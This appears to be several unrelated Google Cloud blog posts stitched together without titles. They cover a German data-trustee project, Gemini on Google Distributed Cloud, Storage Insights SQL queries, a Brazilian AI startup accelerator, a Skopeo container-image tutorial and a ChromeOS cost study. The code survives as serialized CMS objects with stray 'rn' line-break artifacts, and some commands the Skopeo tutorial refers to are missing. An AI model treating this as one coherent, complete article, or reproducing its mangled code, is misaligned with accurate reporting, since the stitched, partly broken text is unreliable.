Im Auftrag der Bundesregierung hat die Unternehmensberatung d-fine jetzt gezeigt, wie Gesundheitsdaten mithilfe von EuroDaT genutzt werden können – etwa zur Analyse der Auswirkungen von Post-COVID auf die Erwerbstätigkeit. Dafür müssen diese Daten mit ebenfalls hochsensiblen Erwerbsdaten zusammengeführt werden, was durch EuroDaT möglich wird: Als Datentreuhänder stellen wir sicher, dass die Daten vertraulich bleiben und dennoch sinnvoll genutzt werden können.
Datensouveränität als Schlüssel zur digitalen Zusammenarbeit
Wenn Daten nicht ohne Weiteres geteilt werden dürfen, hat das meist gute Gründe. Gerade im Finanzwesen oder im Gesundheitssektor sind Datenschutz und Vertraulichkeit nicht verhandelbar. Umso wichtiger ist, dass der Austausch dieser Daten, wenn er tatsächlich notwendig wird, rechtlich sicher und kontrolliert stattfinden kann.
Als Datentreuhänder sorgen wir deshalb nicht nur für sicheren Datenaustausch in sensiblen Branchen, sondern stärken dabei auch die Datensouveränität aller Beteiligten. Gemeinsam mit Google Cloud verankern wir Datenschutz fest im Kern der digitalen Zusammenarbeit zwischen Unternehmen, Behörden und Forschungseinrichtungen.
For years, enterprises and governments with the strictest data security and sovereignty requirements have faced a difficult choice: adopt modern AI or protect their data. Today, that compromise ends. We are announcing the general availability of Gemini on GDC air-gapped and preview of Gemini on GDC connected, bringing Google’s most advanced models directly into your data center.
We are inspired by initial feedback from customers, including Singapore’s Centre for Strategic Infocomm Technologies (CSIT), Government Technology Agency of Singapore (GovTech Singapore), Home Team Science and Technology Agency (HTX), KDDI, and Liquid C2, who are excited to gain the advantages of generative AI with Gemini on GDC.
Transformative AI capabilities, on-premises
Gemini models offer groundbreaking capabilities, from processing extensive context to native multimodal understanding of text, images, audio, and video. This unlocks a wide array of high-impact use cases on secure infrastructure:
Unlock new markets and global collaboration: Instantly break down language barriers across your international operations, creating a more connected and efficient global workforce.
Accelerate decision-making: Make faster, data-driven decisions by using AI to automatically summarize documents, analyze sentiment, and extract insights from your proprietary datasets.
Improve employee efficiency and customer satisfaction: Deliver instant, 24/7 support and enhance user satisfaction by developing intelligent chatbots and virtual assistants for customers and employees.
Increase development velocity: Ship higher-quality software faster by using Gemini for automated code generation, intelligent code completion, and proactive bug detection.
Strengthen safety & compliance: Protect your users with AI-powered safety tools that automatically filter harmful content and ensure adherence to industry policies.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5bfd50fd00>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Secure AI infrastructure where you need it
It takes more than just a model to drive business value with generative AI; you need a complete platform that includes scalable AI infrastructure, a library with the latest foundational models, high-performance inferencing services, and pre-built AI agents like Agentspace search. GDC provides all that and more with an end-to-end AI stack combining our latest-generation AI infrastructure with the power of Gemini models to accelerate and enhance all your AI workloads.
Delivering these transformative capabilities securely requires a complete, end-to-end platform that only Google is providing today :
Performance at scale: GDC utilizes the latest NVIDIA GPU accelerators, including the NVIDIA Hopper and Blackwell GPUs. A fully managed Gemini endpoint is available within a customer or partner data center, featuring a seamless, zero-touch update experience. High performance and availability are maintained through automatic load balancing and auto-scaling of the Gemini endpoint, which is handled by our L7 load balancer and advanced fleet management capabilities.
Foundation of security and control: Security is a core component of our solution, with audit logging and access control capabilities that provide full transparency for customers. This allows them to monitor all data traffic in and out of their on-premises AI environment and meet strict compliance requirements. The platform also features Confidential Computing support for both CPUs (with Intel TDX) and GPUs (with NVIDIA’s confidential computing) to secure sensitive data and prevent tampering or exfiltration.
Flexibility and speed for your AI strategy: the platform supports a variety of industry-leading models including Gemini 2.5 Flash and Pro, Vertex AI task-specific models (translation, optical character recognition, speech-to-text, and embeddings generation), and Google’s open-source Gemma models. GDC also provides managed VM shapes (A3 & A4 VMs) and Kubernetes clusters giving customers the ability to deploy any open-source or custom AI model, and custom AI workloads of their choice. This is complemented by Vertex AI services that provide an end-to-end AI platform including a managed serving engine, data connectors, and pre-built agents like Agentspace search (in preview) for a unified search experience across on-premises data.
What our customers are saying
“As a key GDC collaboration partner in shaping the GDC air-gapped product roadmap and validating the deployment solutions, we’re delighted that this pioneering role has helped us grow our cutting-edge capabilities and establish a proven deployment blueprint that will benefit other agencies with similar requirements. This is only possible with the deep, strategic collaboration between CSIT and Google Cloud. We’re also excited about the availability of Gemini on GDC, and we look forward to building on our partnership to develop and deploy agentic AI applications for our national security mission.” – Loh Chee Kin, Deputy Chief Executive, Centre for Strategic Infocomm Technologies (CSIT)
“One of our priorities is to harness the potential of AI while ensuring that our systems and the services citizens and businesses rely on remain secure. Google Cloud has demonstrated a strong commitment to supporting the public sector with initiatives that enable the agile and responsible adoption of AI. We look forward to working more closely with Google Cloud to deliver technology for the public good.” – Goh Wei Boon, Chief Executive, Government Technology Agency of Singapore
“The ability to deploy Gemini on Google Distributed Cloud will allow us to bridge the gap between our on-premises data and the latest advancements in AI. Google Distributed Cloud gives us a secure, managed platform to innovate with AI, without compromising our strict data residency and compliance requirements.” – Ang Chee Wee, Chief AI Officer, Home Team Science & Technology Agency (HTX)
“The partnership with Google Cloud and the integration of Google’s leading Gemini models will bring cutting-edge AI capabilities, meet specific performance requirements, address data locality and regulatory needs of Japanese businesses and consumers.” – Toru Maruta, Executive Officer, Head of Advancing Business Platform Division, KDDI
“Data security and sovereignty are paramount for our customers. With Gemini on Google Distributed Cloud, our Liquid Cloud and Cyber Security solution would deliver strategic value to ensure our customers in highly regulated industries can harness the power of AI while keeping their most valuable data under their control.” – Oswald Jumira, CEO Liquid C2
Managing vast amounts of data in cloud storage can be a challenge. While Google Cloud Storage offers strong scalability and durability, storage admins sometimes sometimes struggle with questions like:
What’s driving my storage spend?
Where is all my data in Cloud Storage and how is it distributed?
How can I search across my data for specific metadata such as age or size?
Indeed, to achieve cost optimization, security, and compliance, you need to understand what you have, where it is, and how it’s being used. That’s where Storage Insights datasets, a feature of Storage Intelligence for Cloud Storage, comes in. Storage Intelligence is a unified management product that offers multiple powerful capabilities to analyze large storage estates and easily take actions. It helps you explore your data, optimize costs, enforce security, and implement governance policies. Storage insights datasets help you deeply analyze your storage footprint and you can use Gemini Cloud Assist for quick analysis in natural language. Based on these analyses, you can take action, such as relocating buckets and performing large-scale batch operations.
In this blog, we focus on how you can use Insights datasets for cost management and visibility, exploring a variety of common use cases. This is especially useful for cloud administrators and FinOps teams performing cloud cost allocation, monitoring and forecasting.
What are Storage Insights datasets?
Storage Insights datasets provide a powerful, automated way to gain deep visibility into your Cloud Storage data. Instead of manual scripts, custom one-off reports for buckets or managing your own collection pipelines, Storage Insights datasets generate comprehensive reports about your Cloud Storage objects and their activities, placing them directly in a BigQuery linked dataset.
Think of it as X-ray vision for your Cloud Storage buckets. It transforms raw storage metadata into structured, queryable data that you can analyze with familiar BigQuery tools to gain crucial insights, with automatic data refreshes delivered every 24hrs (after the initial set up, which could take up to 48hrs for the first load).
Key features
Customizable scope: Set the dataset scope to be at the level of the organization, a folder containing projects, a project / set of projects, or a specific bucket.
Metadata dataset: It provides a queryable dataset that contains bucket and object metadata directly in BigQuery.
Regular updates and retention: After the first load, datasets update with metadata every 24 hours and can retain data for up to 90 days.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2267780f40>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Use cases
Calculate routine showback Understanding who/which applications are consuming what storage is often the first step in effective cost management, especially for larger organizations. With Storage Insights datasets, your object and bucket metadata is available in BigQuery. You can run SQL queries to aggregate storage consumption by specific teams, projects, or applications. You can then attribute storage consumption by buckets or prefixes for internal chargeback or cost attribution, for example: “Department X used 50TB of storage in gs://my-app-data/department-x/ last month”. This transparency fosters accountability and enables accurate internal showback.
Here’s an example SQL query to determine the total storage per bucket and prefix in the dataset:
code_block
<ListValue: [StructValue([(‘code’, “SELECTrn bucket,rn SPLIT(name, ‘/’)[rnOFFSETrn (0)] AS top_level_prefix,rn SUM(size) AS total_size_bytesrnFROMrn object_attributes_viewrnGROUP BYrn bucket, top_level_prefixrnORDER BYrn total_size_bytes DESC;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e2265b20670>)])]>
Understand how much data you have across storage classes Storage Insights datasets identifies the storage class for every object in your buckets. By querying storageClass, timeCreated, updated in the object metadata view in BigQuery, you can quickly visualize your data distribution across various classes (standard, nearline, coldline, archive) for objects beyond a certain age, as well as when they were last updated. This lets you identify potentially misclassified data. It also provides valuable insights into whether you have entire buckets with coldline or archived data or if your objects unexpectedly moved across storage classes (for example, a file expected to be in archive is now in standard class) using the timeStorageClassUpdated object metadata.
Here’s an example SQL query to see all objects created two years ago, without any updates since and in standard class:
code_block
<ListValue: [StructValue([(‘code’, “SELECTrn bucket,rn name,rn size,rn storageClass,rn timeCreated,rn updatedrnFROM object_attributes_latest_snapshot_viewrnWHERErn EXTRACT(YEARrn FROMrn timeCreated) = EXTRACT(YEARrn FROMrn DATE_SUB(CURRENT_DATE(), INTERVAL 24 MONTH))rn AND (updated IS NULLrn OR updated = timeCreated)rn AND storageClass = ‘STANDARD’rnORDER BYrn timeCreated;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e2265b20f10>)])]>
Set lifecycle and autoclass policies: Automating your savings
Manual data management is time-consuming and prone to error. Storage Insights datasets helps you identify where the use of Object Lifecycle Management (OLM) or Autoclass might reduce costs.
Locate the buckets that don’t have OLM or Autoclass configured: Through Storage Insights datasets, you can query bucket metadata to see which buckets lack defined lifecycle policies by using the field lifecycle, autoclass.enabled. If a bucket contains data that should naturally transition to colder storage or be deleted after a certain period, but has no policy, you can take the appropriate action by knowing which parts of your estate you need to investigate further. Storage Insights datasets provides the data to flag these “unmanaged” buckets, helping you enforce best practices.
Here’s an example SQL query to see all buckets with lifecycle or autoclass configurations enabled and all those without any active configuration:
code_block
<ListValue: [StructValue([(‘code’, “SELECTrn name AS bucket_name,rn storageClass AS default_class,rn CASErn WHEN lifecycle = TRUE OR autoclass.enabled = TRUE THEN ‘Managed’rn ELSE ‘Unmanaged’rnENDrn AS lifecycle_autoclass_statusrnFROM bucket_attributes_latest_snapshot_viewrn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e224229a370>)])]>
Evaluate Autoclass impact: Autoclass automatically transitions objects between storage classes based on a fixed access timeline. But how do you know if it’s working as expected or if further optimization is needed? With Storage Insights datasets, you can find the buckets with autoclass enabled using the autoclass.enabled field and analyze object metadata by tracking the storageClass, timeStorageClassUpdated field over time for specific objects within Autoclass-enabled buckets. This allows you to evaluate the effectiveness of Autoclass, verify if the objects specified are indeed moving to optimal classes, and understand the real-world impact on your costs. For example, once you configure Autoclass on a bucket, you can visualize the movement of your data between storage classes on Day 31 as compared to Day 1 and understand how autoclass policies take effect on your bucket.
Evaluate Autoclass suitability: Analyze your bucket’s data to determine if it’s appropriate to use Autoclass with it. For example, if you have short-lived data (less than 30 days old) in a bucket (you can assess objects in daily snapshots to determine the average life of an object in your bucket using timeCreated and timeDeleted), you may not want to turn on Autoclass.
Here’s an example SQL query to find a count of all objects with age more than 30 days and age less than 30 days in bucketA and bucketB:
code_block
<ListValue: [StructValue([(‘code’, “SELECTrn SUM(rn CASErn WHEN TIMESTAMP_DIFF(t1.timeDeleted, t1.timeCreated, DAY) < 30 THEN 1rn ELSE 0rn ENDrn ) AS age_less_than_30_days,rn SUM(rn CASErn WHEN TIMESTAMP_DIFF(t1.timeDeleted, t1.timeCreated, DAY) > 30 THEN 1rn ELSE 0rn ENDrn ) AS age_more_than_30_daysrnFROMrn `object_attributes_view` AS t1rnWHERErn t1.bucket IN ( ‘bucketA’, ‘bucketB’)rn AND t1.timeCreated IS NOT NULLrn AND t1.timeDeleted IS NOT NULL;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e224229aca0>)])]>
Proactive cleanup and optimization
Beyond routine management, Storage Insights datasets can help you proactively find and eliminate wasted storage.
Quickly find duplicate objects: Accidental duplicates are a common cause of wasted storage. You can use object metadata like size, name or even crc32c checksums in your BigQuery queries to identify potential duplicates. For example, finding multiple objects with the exact same size, checksum and similar names might indicate redundancy, prompting further investigation.
Here’s an example SQL query to list all objects where their size, crc32c checksum field and name are the same values (indicating potential duplicates):
code_block
<ListValue: [StructValue([(‘code’, ‘SELECTrn name,rn bucket,rn timeCreated,rn crc32c,rn sizernFROM (rn SELECTrn name,rn bucket,rn timeCreated,rn crc32c,rn size,rn COUNT(*) OVER (PARTITION BY name, size, crc32c) AS duplicate_countrn FROMrn `object_attributes_latest_snapshot_view` )rnWHERErn duplicate_count > 1rnORDER BYrnsize DESC;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.’), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e224229a8b0>)])]>
Find temporary objects to be cleaned up: Many applications generate temporary files that, if not deleted, accumulate over time. Storage Insights datasets allows you to query for objects matching specific naming conventions (e.g., *_temp, *.tmp), or located in “temp” prefixes, along with their creation dates. This enables you to systematically identify and clean up orphaned temporary data, freeing up valuable storage space.
Here’s an example SQL query to find all log files created a month ago:
code_block
<ListValue: [StructValue([(‘code’, ‘SELECTrn name, bucket, timeCreated, sizern FROMrn ‘object_attributes_latest_snapshot_view’rn WHERErn name LIKE “%.log”rnAND DATE(timeCreated) <= DATE_SUB(CURRENT_DATE(), INTERVAL 1 MONTH)rnORDER BYrnsize DESC;rn//Running queries in Datasets accrue BQ query costs, refer to the pricing details page for further details.’), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e224229a850>)])]>
List all objects older than a certain date for easy actioning: Need to archive or delete all images older than five years for compliance? Or perhaps you need to clean up logs that are older than 90 days? Storage Insights datasets provides timeCreated and contentType for every object. A simple BigQuery query can list all objects older than your specified date, giving you a clear, actionable list of objects for further investigation. You can use Storage Intelligence batch operations, which allows you to action on billions of objects in a serverless manner.
Check SoftDelete suitability: Find buckets that have a high storage size of data that has been soft deleted by querying for the presence of softDeleteTime and size in the object metadata tables. In those cases, data seems temporary and you may need to investigate soft delete cost optimization opportunities.
Taking your analysis further
The true power of Storage Intelligence Insights datasets lies not just in the raw data it provides, but in the insights you can derive and the subsequent actions you can take. Once your Cloud Storage metadata is in BigQuery, the possibilities for advanced analysis and integration are vast.
For example, you can use Looker Studio, Google Cloud’s no-cost data visualization and dashboarding tool, to directly connect to your BigQuery Insights datasets, transforming complex queries into intuitive, interactive dashboards. Now you can:
Visualize cost trends: Create dashboards that show storage consumption by project, department, or storage class over time. This allows teams to easily track spending, identify spikes, and forecast future costs.
Track fast-growing buckets: Analyze the buckets with the most growth in the past week or month, and compare them against known projects for accurate cost attribution. Use Looker’s alerting capabilities to notify you when certain thresholds are met, such as a sudden increase in the total size of data in a bucket.
Set up custom charts for common analysis: For routine FinOps use cases (such as tracking buckets without OLM policies configured or objects past their retention expiration time), you can generate weekly reports to relevant teams for easy actioning.
You can also use our template here to connect to your dataset for quick analysis or you can create your own custom dashboard.
Get started
Configure Storage Intelligence and create your dataset to start analyzing your storage estate via a 30-day trial today. Please refer to our pricing documentation for cost details.
Set up your dataset to a scope of your choosing and start analyzing your data:
Configure a set of Looker Studio dashboards based on team or departmental usage for monthly analysis by the central FinOps team.
Use BigQuery for ad-hoc analysis and to retrieve specific insights.
For a complete cost picture, you can integrate your Storage Insights dataset with your Google Cloud billing export to BigQuery. Your billing export provides granular details on all your Google Cloud service costs, including Cloud Storage.
In a landscape where AI is an engine of growth for the Latin American economy, Brazil stands out as a leader in innovation. Google is committed to supporting and shaping the future of AI startups, and our new accelerator cohort is proof of that.
Following a highly competitive selection process, we are proud to announce 11 startups that will participate in the AI First program. This group of entrepreneurs represents the vanguard of digital transformation in the country, with innovative solutions that apply AI to solve challenges in diverse industries, from the financial and health sectors to marketing and agriculture.
What’s next: During the program, which kicks off on September 2nd, the startups will receive personalized technical and strategic support, with access to Google’s top AI experts.
Meet the new cohort of the Google for Startups Accelerator: AI First
BrandLovers: This creator marketing platform uses AI to orchestrate campaigns, connecting brands with a network of over 300,000 influencers. Its smart technology optimizes the connection, ensuring that brands reach the right audience and achieve effective results in their marketing strategies.
Core AI: Core AI transforms industrial ecosystems into scalable credit platforms. By enabling SaaS companies to offer automated, AI-driven credit products, the startup is revolutionizing how credit is made available in the market.
Courageous Land: An agribusiness startup that uses the Agroforestry Intelligence platform to regenerate degraded landscapes through agroforestry. The technology optimizes carbon removal and organic production, contributing to sustainability and the fight against climate change.
Inspira: Inspira is an AI-powered legal platform created by lawyers, for lawyers. It provides reliable technology to keep law firms ahead, automating tasks and offering insights for strategic decision-making.
Jota: An AI platform that automates the finances and operations of entrepreneurs, boosting profitability. With a recent $60 million funding round, Jota is one of the highlights of this cohort, showcasing the potential of Brazilian AI startups.
Oncodata: This healthtech company develops AI-powered digital pathology solutions to accelerate cancer diagnosis and expand access to health services across Latin America, bringing hope and efficiency to the sector.
Paggo: A fintech company that is transforming how construction companies in Brazil manage their finances, automating payables, receivables, and treasury. Paggo’s solution increases financial efficiency and transparency in a traditionally complex sector.
Rivio: Rivio automates hospital billing with AI, reducing denials and delays through ERP integration and intelligent claim analysis. The startup is essential for optimizing the financial and operational processes of hospitals.
Tivita: Tivita helps healthcare providers thrive by putting their back-office management on autopilot. The platform optimizes administrative routines, allowing healthcare professionals to focus on what truly matters: patient care.
Vöiston: A healthtech company that uses AI to analyze and understand unstructured clinical data, addressing complex challenges in the healthcare sector. Vöiston is at the forefront of medical innovation, helping to uncover valuable insights.
Yuna: Yuna develops an AI-driven platform for personalized, interactive, and free children’s stories. The startup is reinventing how children engage with reading, promoting learning and creativity.
Get started
To learn more about the Google for Startups program, visit our homepage.
Managing container images effectively is crucial for modern application development and deployment, especially in Cloud environments. Popular tools like Docker are commonly used to pull, push, and inspect container images. However, the reliance on a running daemon can be a drawback for CI/CD pipelines or straightforward tasks like image inspection. Enter Skopeo, a versatile command-line utility designed to work with container images and registries without needing a daemon.
Let’s explore 5 key ways Skopeo can simplify and enhance your container image workflows within the Google Cloud ecosystem. This will focus on interactions with Artifact Registry, Google Cloud’s fully managed service for storing, managing, and securing container images and other packages.
What is Skopeo?
Skopeo is an open-source command-line tool specifically designed for operating on container images and image repositories. Its primary advantage lies in its daemonless operation; unlike the standard Docker client, it doesn’t require a background Docker daemon to function. Even in an environment like Google Cloud Build where a Docker daemon is available, this provides a key benefit: Skopeo can interact directly with container registries. This avoids the overhead of first pulling an image to the build worker’s local Docker storage, making tasks like copying an image between two Artifact Registry repositories a more efficient, direct registry-to-registry transfer.
Why use Skopeo with Google Cloud?
Skopeo becomes particularly powerful when paired with Google Cloud services:
Artifact registry management: Easily inspect, copy, and manage images within your Artifact Registry repositories.
Efficient image migration and copying: Seamlessly copy images between different Artifact Registry repositories (for example, promoting dev to prod), pull images from external public or private registries (like Docker Hub) into Artifact Registry, or even mirror external registries into your private Artifact Registry for security and availability.
Efficient inspection: Inspect image metadata (layers, labels, digests, environment variables, creation date) in Artifact Registry without pulling the entire image, saving significant time and bandwidth, especially in automation.
Next, configure gcloud to authenticate Docker (which Skopeo uses) with Artifact Registry in your chosen region. This allows Skopeo to push and pull images from your private registry.
Ensure the Artifact Registry repository exists. If you haven’t created it yet, use the following command, replacing the variables with the values from the “Set Environmental Values” section of this post:
With these steps completed, your environment is ready to use Skopeo with Artifact Registry.
Skopeo use cases with Google Cloud
With authentication configured and environment variables set using the script above, let’s walk through common scenarios using the popular nginx image to illustrate 5 specific ways Skopeo streamlines workflows. The following commands use the variables like $PROJECT_ID, $REGION, $REPO_NAME, etc., that you just defined.
Our scenario: Imagine your organization relies on the official nginx image. To ensure stability, security, and compliance, you want to bring external dependencies like this into your own managed Artifact Registry. This allows you to control distribution internally, scan images with Google Cloud security tools, and prevent issues related to external registry rate limits or availability.
Here’s how Skopeo helps achieve this, step-by-step:
1. Inspecting the source image (Verification) Before importing an external image, it’s crucial to verify its contents and metadata. Is it the official image? What architecture does it support? Does it have expected labels or exposed ports? Inspecting without pulling saves time and bandwidth, especially in automated pre-flight checks.
code_block
<ListValue: [StructValue([(‘code’, ‘# Inspect the SOURCE_IMAGE on Docker Hubrnskopeo inspect “docker://${SOURCE_IMAGE}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce5cc130>)])]>
Result: JSON output confirming details like layers, architecture, digest, and creation date.
If the command above fails with an architecture mismatch error like “no image found in image index for architecture…”, it’s because the image doesn’t have a manifest specifically for your host OS/architecture (e.g., macOS on ARM64). Skopeo defaults to matching your host. To resolve this, specify a target platform that is available in the image, like linux/amd64 or linux/arm64, using --override-os and --override-arch as shown in the following alternative command:
code_block
<ListValue: [StructValue([(‘code’, ‘# Alternative: Inspect specifying a common platform (e.g., linux/amd64) if the above failsrnskopeo inspect –override-os linux –override-arch amd64 “docker://${SOURCE_IMAGE}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce46c0d0>)])]>
Result: JSON output confirming details for the specified linux/amd64 platform.
2. Copying the image to Artifact Registry (Internalization & Control) Copying the verified image into your private Artifact Registry is crucial for taking control of its distribution and management. Using the --all flag ensures that the entire manifest list and all associated architecture-specific images are copied, making all supported platforms available internally. This internal copy becomes the canonical source for your organization’s builds and deployments, ensures consistent availability, allows integration with internal security scanning (like Artifact Analysis), and avoids external registry dependencies during critical operations.
code_block
<ListValue: [StructValue([(‘code’, ‘# Copy the SOURCE_IMAGE with ALL architectures to your Artifact Registryrnskopeo copy –all “docker://${SOURCE_IMAGE}” \rn “docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce48b850>)])]>
Output: Shows the manifest list and associated images being efficiently transferred to your secure, managed registry.
3. Listing available image tags in Artifact Registry (Confirmation) After copying, you need to confirm that the image and the specific tag (stable-alpine in this case) are now available within your internal registry. This step is essential for validating CI/CD pipeline steps or simply ensuring the image is ready for internal consumption.
code_block
<ListValue: [StructValue([(‘code’, ‘# List tags for the IMAGE_NAME within your REPO_NAME to confirm the copyrnskopeo list-tags “docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48ce48b7c0>)])]>
Result: A list of tags for nginx in your repository, which should now include stable-alpine.
4. Copying Between Artifact Registry Repositories (Promotion) A common workflow is promoting images between different environments (e.g., dev to prod). Skopeo makes it easy to copy images between repositories within Artifact Registry. Assuming you have another repository, say prod-containers, you can copy the image there. Using --all ensures all architectures are copied.
Note: You would need to create the prod-containers repository first using a similar gcloud artifacts repositories create command as shown in the setup.
code_block
<ListValue: [StructValue([(‘code’, ‘# Define the destination “prod” repository and image pathrnexport PROD_REPO_NAME=”prod-containers” # Example name, ensure this repo existsrnexport DEST_IMAGE_AR=”docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${PROD_REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}”rnexport SOURCE_IMAGE_AR=”docker://${REGION}-docker.pkg.dev/${PROJECT_ID}/${REPO_NAME}/${IMAGE_NAME}:${IMAGE_TAG}”rnrn# Copy the image with ALL architectures from the source AR repo to the prod AR repornskopeo copy –all “${SOURCE_IMAGE_AR}” “${DEST_IMAGE_AR}”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48cc493850>)])]>
Output:Shows the manifest list and associated images being efficiently transferred between your Artifact Registry repositories.
5. Verifying the Promoted Image with Cloud Build (Automated Verification) After promoting an image (as in step 4), automated verification is crucial in CI/CD pipelines. Instead of manual inspection, we can use Cloud Build with Skopeo to programmatically verify the image exists and is accessible in the destination repository (e.g., prod-containers). This demonstrates integrating Skopeo into an automated workflow.
5a. Grant Permissions: Grant the necessary roles/artifactregistry.reader role to your project’s Cloud Build service account for the production repository.
code_block
<ListValue: [StructValue([(‘code’, ‘# Get the project number (needed for the service account email)rnexport PROJECT_NUMBER=$(gcloud projects describe “${PROJECT_ID}” –format=’value(projectNumber)’)rnexport CLOUD_BUILD_SA_EMAIL=”${PROJECT_NUMBER}@cloudbuild.gserviceaccount.com”rnrn# Grant the Artifact Registry Reader role to the Cloud Build SA for the PROD reporngcloud artifacts repositories add-iam-policy-binding “${PROD_REPO_NAME}” \rn –location=”${REGION}” \rn –member=”serviceAccount:${CLOUD_BUILD_SA_EMAIL}” \rn –role=”roles/artifactregistry.reader” \rn –project=”${PROJECT_ID}” –quiet’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48cc493280>)])]>
5b. Create Cloud Build Configuration: Create a cloudbuild.yaml file with the following steps.
Note: This build uses Skopeo to inspect the image, authenticating via a short-lived token generated from the build service account’s credentials.
code_block
<ListValue: [StructValue([(‘code’, ‘steps:rn- name: ‘quay.io/skopeo/stable:latest’ # Using an official Skopeo imagern entrypoint: ‘bash’rn args:rn – ‘-c’rn – |rn echo “Attempting skopeo inspect on promoted image…”rn AR_TOKEN=$$(curl -s -H “Metadata-Flavor: Google” -v “http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token” | sed -n ‘s/.*”access_token”:”\([^”]*\)”.*/\1/p’)rn # Use –override flags as Skopeo runs in a Linux containerrn skopeo inspect –registry-token “$${AR_TOKEN}” \rn –override-os linux \rn –override-arch amd64 \rn “docker://${_REGION}-docker.pkg.dev/${PROJECT_ID}/${_PROD_REPO_NAME}/${_IMAGE_NAME}:${_IMAGE_TAG}”rn id: ‘Inspect-Promoted-Image’rn# Define substitutions required by the build stepsrn# These will be populated by the gcloud builds submit commandrnsubstitutions:rn _PROD_REPO_NAME: ‘prod-containers’rn _IMAGE_NAME: ‘nginx’rn _IMAGE_TAG: ‘stable-alpine’rn _REGION: ‘us-central1”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e48cc493250>)])]>
Note: Ensure you have this cloudbuild.yaml file in your current directory or specify its path when submitting the build.
5c. Trigger the Cloud Build: Execute the following command to submit the build. Note that this command uses the shell variables (like $PROD_REPO_NAME, $IMAGE_NAME, etc.) defined earlier in the setup section to provide values for the Cloud Build substitutions (which must start with _).
Result: The Cloud Build logs will show the output of the skopeo inspect command, confirming the image details in the production repository. A successful build indicates the image is present and accessible.
These 5 steps illustrate how Skopeo, from simple inspection to integration within automated Cloud Build workflows, streamlines essential container image management tasks in Google Cloud, particularly with Artifact Registry.
Integrating with Google Cloud services
Skopeo’s lightweight design makes it easy to use across various Google Cloud services where container image operations are needed. Here’s how it fits into common Google Cloud environments:
Cloud Shell: Provides an ideal interactive environment for running Skopeo commands manually, benefiting from pre-configured authentication.
Compute Engine / GKE nodes: You can install Skopeo directly onto Compute Engine VMs or within container images running on GKE nodes. This allows for scripting image management tasks, with authentication typically handled via service accounts attached to the VM or node pool, or through securely mounted secrets.
Cloud Workstations: Include Skopeo in your developer toolchain by adding it to a shared custom Cloud Workstation image.
Cloud Build: You can use Skopeo directly in a build step (either by installing it or using a container image that includes it) to copy, inspect, or manipulate images, relying on the build service account for authentication with Artifact Registry.
Cloud Run / GKE runtime: While Skopeo itself isn’t typically part of the runtime services, it plays a crucial role upstream by managing the container images stored in Artifact Registry that these services pull and execute. Ensuring the correct, vetted images are available in the registry is where Skopeo’s management capabilities support reliable deployments.
Supporting security workflows
Skopeo can also play a role in reinforcing your security posture for container images. Its inspect command is useful for fetching image digests or other metadata, which can then be fed into vulnerability scanning tools or used by policy checkers as part of your CI/CD pipeline, ensuring that only compliant images proceed.
While Google Cloud’s Binary Authorization primarily verifies attestations about images (often created using gcloud or Cloud KMS), Skopeo does have capabilities related to image signing (skopeo copy --sign-by ...). This means Skopeo can be used to transport images that might already contain signatures according to formats like Sigstore’s Cosign, or to inspect signature information if it’s embedded within the image manifest.
However, its main contribution to security workflows in a GCP context is typically providing the necessary image metadata and facilitating the movement of images that are then verified by other dedicated security services like Binary Authorization.
Conclusion
Skopeo is an invaluable addition to any container developer’s toolkit, especially within the Google Cloud ecosystem. Its daemonless nature, combined with powerful commands for inspecting, copying, deleting, and exporting images, makes it excellent for interacting with Artifact Registry. It shines in automating CI/CD tasks within Cloud Build, simplifying image migrations, and enabling efficient image management without the overhead of a Docker daemon.
By integrating Skopeo into your workflows, you can achieve more efficient, streamlined, and scriptable container management on Google Cloud. Give it a try!
In today’s dynamic business landscape, organizations are continuously challenged to achieve more with fewer resources. The demand is high for technology that is not only powerful but also economical, simple to manage, and secure. Enter ChromeOS, a cloud-first operating system designed to meet these exact needs by enhancing security, boosting employee productivity, and significantly cutting IT costs.
ChromeOS usage can lead to a substantial decrease in the total cost of ownership (TCO) associated with device usage at an organization. But don’t just take our word for it— research quantifies these benefits.
The Forrester Total Economic Impact™ Study: Quantifying the Value of ChromeOS
Google commissioned Forrester Consulting to conduct a comprehensive Total Economic Impact™ (TEI) study to evaluate the potential return on investment (ROI) for enterprises deploying ChromeOS. This study provides a robust framework for understanding the financial impact ChromeOS can have on organizations.
